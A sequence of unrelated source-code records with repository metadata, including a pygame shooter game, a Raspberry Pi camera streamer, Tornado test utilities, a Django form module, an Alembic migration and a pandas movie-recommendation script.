230e5bda7f6cf4d2322d7112137f588603769da0 | d3b55a592310893dd865e867bbe0e40fe1c16991 | /pythonPackagingTest/textinsights_common/textinsights_common.py | e7f857473cc1db2bced5be2c99a625c83828f9ff | [] | no_license | royassis/pythonPackagingTest | a610161d2953948b224fb4749d0be2199eb946a9 | 9e44f8ceec073272de6509a4b2b2a4763dc9c7aa | refs/heads/master | 2023-07-18T22:10:43.424054 | 2021-09-14T20:40:28 | 2021-09-14T20:40:28 | 406,508,528 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | def some_common_function():
print("im from the textinsights_common.py inside the textinsights_common package") | [
"[email protected]"
] | |
aa40fbd4c1451df0849cac5384e87d8c7d91f01f | 3c88eeb663b109118e734ab6d4a00cf8a8138125 | /become_python_developer/1_programming_foundations_algorithms/5 Searching/issorted_start.py | 759073f96ca38cabc56e10f940cbdcfbc46c6527 | [] | no_license | Gustacro/learning_python | 0dea054751b90cd1df64cb0b9b075fa0bc7a303d | 29562eb625c90b2839a19fd06967c3e9a9f994a3 | refs/heads/master | 2020-12-10T00:55:14.953087 | 2020-01-15T06:50:06 | 2020-01-15T06:50:06 | 233,465,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 629 | py | # determine if a list is sorted
items1 = [6, 8, 19, 20, 23, 41, 49, 53, 56, 87]
items2 = [6, 20, 8, 19, 56, 23, 87, 41, 49, 53]
def is_sorted(itemlist):
# TODO: using the brute force method
for i in range(0, len(itemlist) - 1):
if itemlist[i] > itemlist[i + 1]:
return False
return True
# Use comprehensive list to do the same as the for LOOP above:
# all() will return True if all evaluation are true, or False if any evaluation returns false
# return all(itemlist[i] <= itemlist[i + 1] for i in range(0, len(itemlist) -1))
print(is_sorted(items1))
print(is_sorted(items2))
| [
"[email protected]"
] | |
9117c58f9d9af792df47ed740986fa42b7b8c09b | dca45975cb56e3bfad07c28bdfd672db66b3c1c6 | /game.py | 61a5eac726c05186396ed7a8c1971daaf58612b6 | [] | no_license | CristianGrageda/ProyectoSL | 0f72239c7863fea24011b83b372ea601d422028a | 6e38a54c24418f6c1eaaef9ca10aa9a96c45fcdb | refs/heads/master | 2023-01-30T08:24:26.730975 | 2020-12-11T12:22:20 | 2020-12-11T12:22:20 | 305,205,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,818 | py | import pygame
from menu import *
from metodos_clases import *
from camara import *
class Game():
def __init__(self):
pygame.init()
# -- JUEGO EN EJECUCION, COMENZAR A JUGAR, JUEGO YA INICIALIZADO(para manejar el pause) --
self.ejecucion, self.jugar, self.inicio = True, False, False
self.nivel = 1
# -- VARIABLES PARA INTERACTUAR CON EL MENU --
self.TECLA_ARRIBA, self.TECLA_ABAJO, self.TECLA_ENTER, self.TECLA_ATRAS = False, False, False, False
self.ANCHO, self.ALTO = 800, 600
# -- SUPERFICIE PARA PINTAR EL JUEGO Y VENTANA PARA PROYECCION FINAL --
self.ventana_atras = pygame.Surface((self.ANCHO, self.ALTO))
self.ventana = pygame.display.set_mode(((self.ANCHO, self.ALTO)))
# -- FUENTES DE LETRAS --
self.fuente_1 = 'fuentes/Super Retro M54.ttf'
self.fuente_2 = 'fuentes/Target Shooting.otf'
self.fuente_3 = 'fuentes/lcddot_tr.ttf'
# -- SONIDOS E IMAGENES DEL MENU --
self.sonido_cursor = pygame.mixer.Sound("sonidos/cursor_menu.wav")
self.sonido_seleccion = pygame.mixer.Sound("sonidos/seleccion_menu.wav")
self.sonido_deseleccion = pygame.mixer.Sound("sonidos/deseleccion_menu.wav")
self.fondo_controles = pygame.image.load("multimedia/controles.png").convert()
self.fondo_menu = pygame.image.load("multimedia/menu_principal.png").convert()
self.fondo_creditos = pygame.image.load("multimedia/creditos.png").convert()
self.vida_jugador = pygame.image.load("multimedia/vida_soldado.png").convert_alpha()
# -- COLORES Y MITAD DE VENTANA --
self.NEGRO, self.BLANCO, self.VERDE, self.AMARILLO, self.ROJO = (0, 0, 0), (255, 255, 255), (0, 125, 15), (213, 213, 0), (185, 0, 0)
self.MITAD_ANCHO = self.ANCHO/2
self.MITAD_ALTO = self.ALTO/2
# -- CREACION DE LOS MENUS --
self.menu_principal = MenuPrincipal(self)
self.menu_niveles = MenuNivel(self)
self.menu_controles = MenuControles(self)
self.menu_creditos = MenuCreditos(self)
self.menu_datos = MenuDatos(self)
# -- ASIGNA ESTADO DEL MENU PARA SABER EN CUAL MENU ESTAR --
self.estado_menu = self.menu_principal
self.seleccion = "Nada" # Selecciona opcion de "Menu de datos"
self.reloj = pygame.time.Clock() # Crea Reloj
self.muro = pygame.image.load("multimedia/muro.png").convert()
# --- CARGA DE IMAGENES PARA MAPA ---
self.muro_roto = pygame.image.load("multimedia/muro_roto.png").convert()
self.item = pygame.image.load("multimedia/item.png").convert_alpha()
self.pozo = pygame.image.load("multimedia/pozo.png").convert_alpha()
self.botiquin = pygame.image.load("multimedia/botiquin.png").convert_alpha()
self.mancha = pygame.image.load("multimedia/mancha.png").convert_alpha()
self.misil_icono = pygame.image.load("multimedia/misil_icono.png").convert_alpha()
def nivel_uno(self):
# --- MAPA ---
self.crear_mapa = [
"MMMMMMMMMNMMMMMMMMMMMMMMMMMNMMMM",
"M MI M",
"MR R R M R RM",
"M M R M R M",
"MI RM MNMM M",
"MMMMMM M M",
"M M M",
"MR MMMMMMR I M",
"MI MR MMMMMMMMM N",
"M RMI B IM M",
"MR M M M",
"NMMMMMMMMMMMMR MR RM R M",
"M I BN M M M",
"MR R M M M M",
"M M M M R M M",
"M MR M M M M",
"MIRM M M M M",
"MMMM R M MR RM M",
"M M M M M",
"MI RM M MR M",
"MR M M R N M",
"M M R M",
"MB M R IM",
"MMMMMMMMMMMMNMMMMMMMMMMMMMMMMMMM"
]
# --- CREACION DE DATOS NECESARIOS ---
self.player = Player(self.MITAD_ANCHO, self.MITAD_ALTO, self.nivel) # Crea Jugador
self.camara = Camara(self.player) # Crea Camara y sus movimientos
self.camara_seguir = Seguir(self.camara,self.player)
self.camara_limitada = Limite(self.camara,self.player)
self.camara.cambiar_modo(self.camara_seguir)
self.fondo = Fondo(self.camara, self.camara_seguir, self.camara_limitada, self.nivel) # Crea Fondo
# --- CREAMOS EL MAPA ---
self.mapa = construir_mapa(self.crear_mapa, self.muro, self.muro_roto, self.item, self.pozo, self.botiquin, self.mancha, self.misil_icono, self.player)
# --- AGREGA SPRITES NECESARIOS ---
self.all_sprites = pygame.sprite.Group()
self.aliens = []
self.aliens = crear_aliens(self.all_sprites, self.crear_mapa, self.aliens, self.player.mas_respawn, self.nivel, self.player)
def nivel_dos(self):
self.nivel_uno()
# --- MAPA ---
self.crear_mapa = [
"MMMMMMMMMMMMNMMMMMMMMMMMMMMMMMMMMMNMMMMM",
"MI M IM M",
"M R R M R MR RN",
"M MMS M R M M",
"MB M RMB M M",
"M MMS RM M",
"M R M N N",
"NMMMMMMMMMM MMMMMMMMMMMMMMMMMM MR M",
"M M M M",
"MR R MMS R M R M",
"M M RM M",
"MB I MMS M M",
"MMMMMMMMMMMMMMMMMMMMMMMMMMMNMMMMMMMMB RM",
"M M",
"M R S R I S R M",
"M MMMMMMMMMMMNMMMMMMMMMMMMMNMMMMMMMMMN",
"M BM IM",
"N R R M R R B RM",
"M S R M MMMMMMMMMMMMMM",
"M RIM M",
"M MMMMMNMMMMMMMMMMMMMMSR RM",
"M IM",
"MR S R R S M",
"NMMMMMMNMMMMMMMM NMMMMMMMMMMMM MMMN",
"MB M M M",
"MI R M MR RM",
"MR M RR M R M",
"M NMS S N",
"MR MMMMMMMM MMMMMMM",
"M M M R R M",
"MIS R MM BMS I B M",
"MMMMMMMMNMMMMMMNMMMMMMMMMMMMMMMMMMNMMMMN"
]
# --- CREAMOS EL MAPA ---
self.mapa = construir_mapa(self.crear_mapa, self.muro, self.muro_roto, self.item, self.pozo, self.botiquin, self.mancha, self.misil_icono, self.player)
# --- AGREGA SPRITES NECESARIOS ---
self.all_sprites = pygame.sprite.Group()
self.aliens = []
self.aliens = crear_aliens(self.all_sprites, self.crear_mapa, self.aliens, self.player.mas_respawn, self.nivel, self.player)
def nivel_final(self):
self.crear_mapa = [
" M M ",
" M M ",
" M M ",
" M M ",
" M M ",
" M M ",
" M M ",
" M M ",
" M M ",
" M M ",
" M M ",
"B M MC "
]
self.fondo = Fondo(0, 0, 0, self.nivel) # Crea Fondo
self.player = Player(self.MITAD_ANCHO, 550, self.nivel) # Crea Jugador
self.boss = Boss(300, 0)
self.mapa = construir_mapa(self.crear_mapa, self.muro, self.muro_roto, self.item, self.pozo, self.botiquin, self.mancha, self.misil_icono, self.player)
self.all_sprites = pygame.sprite.Group()
self.all_sprites.add(self.boss)
self.aliens = []
self.aliens = crear_aliens(self.all_sprites, self.crear_mapa, self.aliens, self.player.mas_respawn, self.nivel, self.player)
self.aliens.append(self.boss)
def bucle_juego(self):
pygame.mixer.music.stop()
pygame.mixer.music.load("sonidos/fondo1.mp3")
# -- AL EMPEZAR A JUGAR SE DECLARA EL JUEGO COMO "INICIALIZADO" --
if self.jugar:
self.inicio = True
pygame.mixer.music.play()
else:
pygame.mixer.music.stop()
while self.jugar:
if self.nivel == 1 or self.nivel == 2:
teclado = pygame.key.get_pressed()
for event in pygame.event.get():
# -- CERRAR EL JUEGO AL CERRAR VENTANA --
if event.type == pygame.QUIT:
pygame.quit()
# -- IR AL MENU AL PRESIONAR ESC --
if event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:
self.jugar = False
self.estado_menu = self.menu_principal
pygame.mixer.music.stop()
# -- EVENTOS DE MOVIMIENTO DEL JUGADOR (JUGADOR QUIETO, DISPARO) --
if event.type == pygame.KEYDOWN:
if (event.key == pygame.K_SPACE or event.key == pygame.K_RETURN) and self.player.pulsado:
self.player.sonido_disparo.stop()
if self.player.posicion == 0:
self.player.disparar(self.all_sprites, self.player.rect.centerx-15, self.player.rect.centery, 0)
elif self.player.posicion == 1:
self.player.disparar(self.all_sprites, self.player.rect.centerx+10, self.player.rect.centery, 0)
elif self.player.posicion == 2:
self.player.disparar(self.all_sprites, self.player.rect.centerx, self.player.rect.centery+10, 0)
elif self.player.posicion == 3:
self.player.disparar(self.all_sprites, self.player.rect.centerx, self.player.rect.centery+10, 0)
self.player.sonido_disparo.play()
self.player.pulsado = False
if event.type == pygame.KEYUP:
if (event.key == pygame.K_LEFT or event.key == pygame.K_a) and (teclado[pygame.K_RIGHT] == False and teclado[pygame.K_UP] == False and teclado[pygame.K_DOWN] == False):
self.player.animacion('quieto_izquierda')
self.player.posicion = 3
elif (event.key == pygame.K_RIGHT or event.key == pygame.K_d) and (teclado[pygame.K_LEFT] == False and teclado[pygame.K_UP] == False and teclado[pygame.K_DOWN] == False):
self.player.animacion('quieto_derecha')
self.player.posicion = 2
elif (event.key == pygame.K_UP or event.key == pygame.K_w) and (teclado[pygame.K_RIGHT] == False and teclado[pygame.K_LEFT] == False and teclado[pygame.K_DOWN] == False):
self.player.animacion('quieto_arriba')
self.player.posicion = 1
elif (event.key == pygame.K_DOWN or event.key == pygame.K_s) and (teclado[pygame.K_RIGHT] == False and teclado[pygame.K_UP] == False and teclado[pygame.K_LEFT] == False):
self.player.animacion('quieto_abajo')
self.player.posicion = 0
if event.key == pygame.K_SPACE or event.key == pygame.K_RETURN:
self.player.pulsado = True
# -- Cambiar modo de Camara
self.fondo.modo_de_camara(event)
# --- Eventos de Player y Movimiento de Camara ---
self.player.update(self.mapa, self.all_sprites, self.camara, self.aliens)
self.camara.scroll()
# --- CUANDO SE RECOGEN 4, 8 Y 9 ITEMS APARECEN MAS ALIENS AEREOS ---
if (self.player.items == 6 or self.player.items == 3 or self.player.items == 2) and self.player.mas_respawn:
self.aliens = crear_aliens(self.all_sprites, self.crear_mapa, self.aliens, self.player.mas_respawn, self.nivel, self.player)
self.player.mas_respawn = False
# --- Pintamos en la ventana ---
self.fondo.update(self.ventana_atras, self.camara.offset.x, self.camara.offset.y)
pintar_mapa(self.ventana_atras, self.mapa, self.camara.offset.x, self.camara.offset.y)
self.all_sprites.update(self.mapa, self.camara.offset.x, self.camara.offset.y, self.ventana_atras, self.aliens, self.player, self.all_sprites)
self.ventana_atras.blit(self.player.image, (self.player.rect.x - self.camara.offset.x, self.player.rect.y - self.camara.offset.y))
pintar_vida(self.ventana_atras, 0, 531, self.player.vida, self.player.vida_total, self.BLANCO, self.VERDE, self.vida_jugador)
self.pintar_record("A L I E N S : ", 25, 650, 553, self.player.alien_muertos)
self.pintar_record("I T E M S : ", 25, 650, 569, self.player.items)
self.ventana.blit(self.ventana_atras, (0,0))
# --- SI EL JUGADOR RECOGE TODOS LOS ITEMS Y MATA A TODOS, GANA ---
if self.player.items == 0 and self.player.alien_muertos == 0:
self.inicio = False
self.jugar = False
self.seleccion = "Logro"
self.estado_menu = self.menu_datos
pygame.mixer.music.stop()
elif self.nivel == 3:
teclado = pygame.key.get_pressed()
for event in pygame.event.get():
# -- CERRAR EL JUEGO AL CERRAR VENTANA --
if event.type == pygame.QUIT:
pygame.quit()
# -- IR AL MENU AL PRESIONAR ESC --
if event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:
self.jugar = False
self.estado_menu = self.menu_principal
pygame.mixer.music.stop()
# -- EVENTOS DE MOVIMIENTO DEL JUGADOR (JUGADOR QUIETO, DISPARO) --
if event.type == pygame.KEYDOWN:
if (event.key == pygame.K_SPACE or event.key == pygame.K_RETURN) and self.player.pulsado:
self.player.sonido_disparo.stop()
self.player.disparar(self.all_sprites, self.player.rect.centerx, self.player.rect.centery, 0)
self.player.sonido_disparo.play()
self.player.pulsado = False
if event.type == pygame.KEYUP:
if (event.key == pygame.K_LEFT or event.key == pygame.K_a) and (teclado[pygame.K_RIGHT] == False):
self.player.animacion('quieto_izquierda')
self.player.posicion = 3
elif (event.key == pygame.K_RIGHT or event.key == pygame.K_d) and (teclado[pygame.K_LEFT] == False):
self.player.animacion('quieto_derecha')
self.player.posicion = 2
if event.key == pygame.K_SPACE or event.key == pygame.K_RETURN:
self.player.pulsado = True
if event.key == pygame.K_e:
if self.player.botiquin_disponible > 0:
if self.player.vida < self.player.vida_total:
self.player.vida += 10
self.player.botiquin_disponible -= 1
self.player.sonido_vida.play()
if self.player.vida > self.player.vida_total:
self.player.vida = self.player.vida_total
if event.key == pygame.K_q:
if self.player.misil_disponible > 0:
self.player.sonido_misil.stop()
self.player.disparar(self.all_sprites, self.player.rect.centerx, self.player.rect.centery, 1)
self.player.sonido_misil.play()
self.player.misil_disponible -= 1
# --- Eventos de Player y Movimiento de Camara ---
self.player.update(self.mapa, self.all_sprites, 0, self.aliens)
# --- CUANDO SE RECOGEN 4, 8 Y 9 ITEMS APARECEN MAS ALIENS AEREOS ---
if self.player.oleada_aranias == 0:
self.aliens = crear_aliens(self.all_sprites, self.crear_mapa, self.aliens, self.player.mas_respawn, self.nivel, self.player)
# --- Pintamos en la ventana ---
self.fondo.update(self.ventana_atras, 0, 0)
pintar_mapa(self.ventana_atras, self.mapa, 0, 0)
self.all_sprites.update(self.mapa, 0, 0, self.ventana_atras, self.aliens, self.player, self.all_sprites)
self.ventana_atras.blit(self.player.image, (self.player.rect.x, self.player.rect.y))
pintar_vida_final(self.ventana_atras, 25, 441, self.player.vida, self.player.vida_total, self.VERDE, self.AMARILLO, self.ROJO)
pintar_vida_final(self.ventana_atras, 725, 441, self.boss.vida, self.boss.vida_total, self.VERDE, self.AMARILLO, self.ROJO)
self.pintar_record("x ", 45, 75, 575, self.player.botiquin_disponible)
self.pintar_record("x ", 45, 775, 575, self.player.misil_disponible)
self.ventana.blit(self.ventana_atras, (0,0))
# --- SI EL JUGADOR RECOGE TODOS LOS ITEMS Y MATA A TODOS, GANA ---
if self.boss.vida <= 0:
self.boss.sonido_muerte.play()
self.inicio = False
self.jugar = False
self.seleccion = "Logro"
self.estado_menu = self.menu_datos
pygame.mixer.music.stop()
# --- SI EL JUGADOR SE QUEDA SIN VIDA, MUESTRA MENSAJE DE DERROTA ---
if self.player.vida <= 0:
self.inicio = False
self.jugar = False
self.seleccion = "Derrota"
self.estado_menu = self.menu_datos
pygame.mixer.music.stop()
# --- Actualiza ventana ---
pygame.display.flip()
# --- FPS ---
self.reloj.tick(50)
self.resetear_teclas()
# ---- DETECTA LAS OPCIONES SELECCIONADAS EN LOS MENU ----
def chequear_eventos(self):
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.ejecucion, self.jugar = False, False
self.estado_menu.run_display = False
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_RETURN:
self.sonido_seleccion.play()
self.TECLA_ENTER = True
if event.key == pygame.K_BACKSPACE:
self.sonido_deseleccion.play()
self.TECLA_ATRAS = True
if event.key == pygame.K_DOWN:
self.sonido_cursor.play()
self.TECLA_ABAJO = True
if event.key == pygame.K_UP:
self.sonido_cursor.play()
self.TECLA_ARRIBA = True
# ---- RESETEA LAS TECLAS EN LOS MENU ----
def resetear_teclas(self):
self.TECLA_ARRIBA, self.TECLA_ABAJO, self.TECLA_ENTER, self.TECLA_ATRAS = False, False, False, False
# ---- PINTA LOS TEXTOS DE LOS MENUS
def pintar_texto(self, texto, tamanio, x, y ):
fuente = pygame.font.Font(self.fuente_1, tamanio)
texto_superficie = fuente.render(texto, True, self.BLANCO)
texto_rect = texto_superficie.get_rect()
texto_rect.center = (x,y)
self.ventana_atras.blit(texto_superficie,texto_rect)
# ---- PINTA EL "CURSOR" PARA SELECCIONAR OPCIONES EN EL MENU ----
def pintar_cursor(self, texto, tamanio, x, y ):
fuente = pygame.font.Font(self.fuente_2, tamanio)
texto_superficie = fuente.render(texto, True, self.BLANCO)
texto_rect = texto_superficie.get_rect()
texto_rect.center = (x,y)
self.ventana_atras.blit(texto_superficie,texto_rect)
# ---- PINTA LOS PUNTOS QUE FALTAN PARA EL PROXIMO NIVEL ----
def pintar_record(self, texto, tamanio, x, y, puntos):
texto = texto + str(puntos)
fuente = pygame.font.Font(self.fuente_3, tamanio)
texto_superficie = fuente.render(texto, True, self.BLANCO)
texto_rect = texto_superficie.get_rect()
texto_rect.center = (x,y)
self.ventana_atras.blit(texto_superficie,texto_rect)
| [
"[email protected]"
] | |
236ed30e3874b7479cd53c90e99ac5529579ce13 | 53c0df3772d2cf69f52d715d7a897b9d79e84a75 | /camera.py | a01229adb72b6a7fa16f6adc1ea19a56596c381a | [] | no_license | jmajurel/spyCam | 00723eb7a6fece84c867b1c363054aa819bedf38 | b0a8a84e21bbd02023b72deeb9650b714968278f | refs/heads/master | 2023-03-07T21:55:11.369965 | 2021-02-17T16:23:16 | 2021-02-17T16:23:16 | 338,104,577 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 913 | py | from io import BytesIO
from time import sleep
from picamera import PiCamera
from image_analyser import ImageAnalyser
import cv2
class Camera:
def __init__(self, width = 1024, height = 768):
self.__camera = PiCamera()
self.__camera.resolution = (width, height)
self.stream = BytesIO()
self.__delay = 2
self.__image_analyser = ImageAnalyser()
def warm_up(self):
self.__camera.start_preview()
sleep(self.__delay)
def take_picture(self, name='image.jpeg'):
self.warm_up()
self.__camera.capture(name)
def take_continuous(self):
for i in self.__camera.capture_continuous(self.stream, 'jpeg', use_video_port=True):
self.stream = self.__image_analyser.identify_people(self.stream)
self.stream.seek(0)
image_as_bytes = self.stream.read()
self.stream.seek(0)
self.stream.truncate()
yield (b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' + image_as_bytes + b'\r\n\r\n')
| [
"[email protected]"
] | |
9cefaaea70f554b97014656f629c999bf36330c8 | ff0c17789badd75559eb834fe039d4b4ab175ba8 | /pythonscript/x11-64-cpython/lib/python3.6/site-packages/tornado/test/util.py | 63a9762f14affb81d80e41f4f7f60d079bbe6a34 | [
"LicenseRef-scancode-python-cwi",
"LicenseRef-scancode-free-unknown",
"Python-2.0",
"GPL-1.0-or-later",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unicode",
"BSD-3-Clause",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"OpenSSL",
"MIT"
] | permissive | studioschade/notebook_graph | 3f7555ab46167b050e461164c6b4a1525dc7df0c | 0fd159855fdd9c38a6dd293e5ec6164986ad6209 | refs/heads/master | 2022-10-23T23:54:54.467050 | 2018-10-14T08:10:18 | 2018-10-14T08:10:18 | 148,099,361 | 9 | 2 | MIT | 2022-10-10T20:16:48 | 2018-09-10T04:32:44 | Python | UTF-8 | Python | false | false | 4,006 | py | from __future__ import absolute_import, division, print_function
import contextlib
import os
import platform
import socket
import sys
import textwrap
from tornado.testing import bind_unused_port
# Delegate the choice of unittest or unittest2 to tornado.testing.
from tornado.testing import unittest
skipIfNonUnix = unittest.skipIf(os.name != 'posix' or sys.platform == 'cygwin',
"non-unix platform")
# travis-ci.org runs our tests in an overworked virtual machine, which makes
# timing-related tests unreliable.
skipOnTravis = unittest.skipIf('TRAVIS' in os.environ,
'timing tests unreliable on travis')
skipOnAppEngine = unittest.skipIf('APPENGINE_RUNTIME' in os.environ,
'not available on Google App Engine')
# Set the environment variable NO_NETWORK=1 to disable any tests that
# depend on an external network.
skipIfNoNetwork = unittest.skipIf('NO_NETWORK' in os.environ,
'network access disabled')
skipBefore33 = unittest.skipIf(sys.version_info < (3, 3), 'PEP 380 (yield from) not available')
skipBefore35 = unittest.skipIf(sys.version_info < (3, 5), 'PEP 492 (async/await) not available')
skipNotCPython = unittest.skipIf(platform.python_implementation() != 'CPython',
'Not CPython implementation')
# Used for tests affected by
# https://bitbucket.org/pypy/pypy/issues/2616/incomplete-error-handling-in
# TODO: remove this after pypy3 5.8 is obsolete.
skipPypy3V58 = unittest.skipIf(platform.python_implementation() == 'PyPy' and
sys.version_info > (3,) and
sys.pypy_version_info < (5, 9),
'pypy3 5.8 has buggy ssl module')
def _detect_ipv6():
if not socket.has_ipv6:
# socket.has_ipv6 check reports whether ipv6 was present at compile
# time. It's usually true even when ipv6 doesn't work for other reasons.
return False
sock = None
try:
sock = socket.socket(socket.AF_INET6)
sock.bind(('::1', 0))
except socket.error:
return False
finally:
if sock is not None:
sock.close()
return True
skipIfNoIPv6 = unittest.skipIf(not _detect_ipv6(), 'ipv6 support not present')
def refusing_port():
"""Returns a local port number that will refuse all connections.
Return value is (cleanup_func, port); the cleanup function
must be called to free the port to be reused.
"""
# On travis-ci, port numbers are reassigned frequently. To avoid
# collisions with other tests, we use an open client-side socket's
# ephemeral port number to ensure that nothing can listen on that
# port.
server_socket, port = bind_unused_port()
server_socket.setblocking(1)
client_socket = socket.socket()
client_socket.connect(("127.0.0.1", port))
conn, client_addr = server_socket.accept()
conn.close()
server_socket.close()
return (client_socket.close, client_addr[1])
def exec_test(caller_globals, caller_locals, s):
"""Execute ``s`` in a given context and return the result namespace.
Used to define functions for tests in particular python
versions that would be syntax errors in older versions.
"""
# Flatten the real global and local namespace into our fake
# globals: it's all global from the perspective of code defined
# in s.
global_namespace = dict(caller_globals, **caller_locals) # type: ignore
local_namespace = {}
exec(textwrap.dedent(s), global_namespace, local_namespace)
return local_namespace
def subTest(test, *args, **kwargs):
"""Compatibility shim for unittest.TestCase.subTest.
Usage: ``with tornado.test.util.subTest(self, x=x):``
"""
try:
subTest = test.subTest # py34+
except AttributeError:
subTest = contextlib.contextmanager(lambda *a, **kw: (yield))
return subTest(*args, **kwargs)
| [
"[email protected]"
] | |
76312bdcf2c0cb870c0669be05da954c69104c19 | 39bf3bec014e64e80df52b697c9a8ba841dbb121 | /migrations/versions/1aae715e7889_.py | 1e8f08fe69be586899d07cc42c5adfac9d538bc1 | [] | no_license | f0rtun3/nexure-backend | e233c00830e418d7191949fdb062cb4c2c547cfa | 5daadc81c2dac3dc936cb2fd58a8f113846201e0 | refs/heads/master | 2022-04-06T00:59:01.922040 | 2020-02-22T15:47:18 | 2020-02-22T15:47:18 | 194,633,366 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 917 | py | """empty message
Revision ID: 1aae715e7889
Revises: de4bf6718891
Create Date: 2019-09-27 11:37:30.461476
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '1aae715e7889'
down_revision = 'de4bf6718891'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('organization_customer', sa.Column('org_reg_number', sa.String(length=50), nullable=True))
op.drop_column('organization_customer', 'org_registration_number')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('organization_customer', sa.Column('org_registration_number', sa.VARCHAR(length=50), autoincrement=False, nullable=True))
op.drop_column('organization_customer', 'org_reg_number')
# ### end Alembic commands ###
| [
"[email protected]"
] | |
41dd8a8167fa73c682f82e184e86c74410f5ba54 | f9977e4436647909615efc78155c13bf4b22c7a3 | /APCS3.py | 49b41eab05ebff34539569b6b060dc062e4a08bc | [] | no_license | AtamKing/APCS | 1627e9ddf111853770aa724491366e4fa5ebed31 | 15e2fcc3fdee069dd8e7a5cdb4d243a38368c9b7 | refs/heads/master | 2021-04-30T04:44:24.706565 | 2018-02-14T18:07:00 | 2018-02-14T18:07:00 | 121,543,315 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 749 | py | import time
print("To play this game you may need some instructions.")
print("You will be asked questions and given responces to choose from.")
print("Type your responce then hit enter.")
print("To check your inventory type inventory and to drop an item type the item number.")
print("To use an item type use /Item name/")
start = (input("Enter start to start game.\n\n"))
Q1 = input("zzzzz...\n\nWAKE UP!!!\n\nA. WHAT HAPPENED?!\nB. 5 more minuets.\n\n")
if start == True:
print(Q1)
if Q1 == "A":
print("explanaitionsjgfh")
if Q1 == "B":
print("FINE")
time.sleep(300)
print(Q1)
if start == "start":
start == True
else:
start == False
print("start")
| [
"[email protected]"
] | |
10e78e45543f83aebb130d335505cc3f7e5335f8 | 35656324f2c2b3f7713c8ee8ca3af73521319f1b | /accounts/forms.py | dd56ac72690d3aa5fb1b56f41abbca89ed4623f5 | [
"CC0-1.0"
] | permissive | jorgegomesen/djangosecommerce | 15beb3c7f4276cd3250c393b7c3c470cfe6dc0af | 22541d24af52cd6f2d51196116a101583389b945 | refs/heads/main | 2023-05-30T06:09:23.608322 | 2021-06-14T08:37:06 | 2021-06-14T08:37:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | from django.contrib.auth.forms import UserCreationForm
from .models import User
from django import forms
class UserAdminCreationForm(UserCreationForm):
class Meta:
model = User
fields = ['username','name','email']
class UserAdminForm(forms.ModelForm):
class Meta:
model = User
fields = ['username', 'name','email','is_active','is_staff']
| [
"[email protected]"
] | |
1a9f46bb191c3c5bf65c5735eef1d693c64b3685 | 8b2f0e2d3dae3cdba29caa4bc28f3482b138a42c | /MovieRecommendationSystem.py | 5a2ac991186ed1a8256ef2ff650b32ac830d0c7b | [] | no_license | MichaelRinglein/MachineLearning | 57d49b756c147b3c2673df49f4ba110b0ba33449 | a2970e64f18143dd65eff198bc87a0c2f4745f6b | refs/heads/master | 2020-03-28T12:30:38.665222 | 2018-09-22T14:09:58 | 2018-09-22T14:09:58 | 148,305,241 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,329 | py | # Movie recommendation system
# Item based collaborative filtering
import pandas as pd
import numpy as np
# Sorting the data
r_cols = ['user_id', 'movie_id', 'rating']
ratings = pd.read_csv('ratings.data', sep='\t', names=r_cols, usecols=range(3), encoding="ISO-8859-1")
m_cols = ['movie_id', 'title']
movies = pd.read_csv('movies.item', sep='|', names=m_cols, usecols=range(2), encoding="ISO-8859-1")
ratings = pd.merge(movies, ratings)
#print(ratings.head())
# Creating a new table to look at relationship between movies from each user_id
# We want to see what movies f.i. the user with the id 1 has rated
movieRatings = ratings.pivot_table(index=['user_id'], columns=['title'], values='rating')
#print(movieRatings.head()) #we see that the user 1 has f.i. rated '101 dalmatians' and '12 angry men' and more
# Extracting the users who rated Star Wars
starWarsRatings = movieRatings['Star Wars (1977)']
#print(starWarsRatings.head())
# Finding out the correlation of Star Wars' ratings to other movies, using corrwith
similarMovies = movieRatings.corrwith(starWarsRatings)
similarMovies = similarMovies.dropna() #Dropping missing results
df = pd.DataFrame(similarMovies)
#print(df.head())
# Sorting the results
sorted = similarMovies.sort_values(ascending=False)
#print(sorted)
# many movies with high correlation don't seem to make sense
# the recommendation of movies for everyone who rated Star Wars high don't make sense
# Something seems to be off
# Throwing out the movies that have beeen rated just few times
movieStats = ratings.groupby('title').agg({'rating':[np.size, np.mean]}) #creating new dataframe aggregating together the number of ratings and mean of rating for every movie title
#print(movieStats.head()) #f.i. '101 Dalamatians' have 109 ratings, but a movie called '1-900' has just 5 ratings
# Throwing out movies that have been rated less than 100 times
popularMovies = movieStats['rating']['size'] >= 100
print(movieStats[popularMovies].sort_values([('rating', 'mean')], ascending=False)[:15])
# Joining together with the original data set
df = movieStats[popularMovies].join(pd.DataFrame(similarMovies, columns=['similarity']))
print(df.head()) #makes more sense
# Sorting by similarity to Star Wars
print(df.sort_values(['similarity'], ascending=False)[:15])
# Now this looks reasonable
| [
"[email protected]"
] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.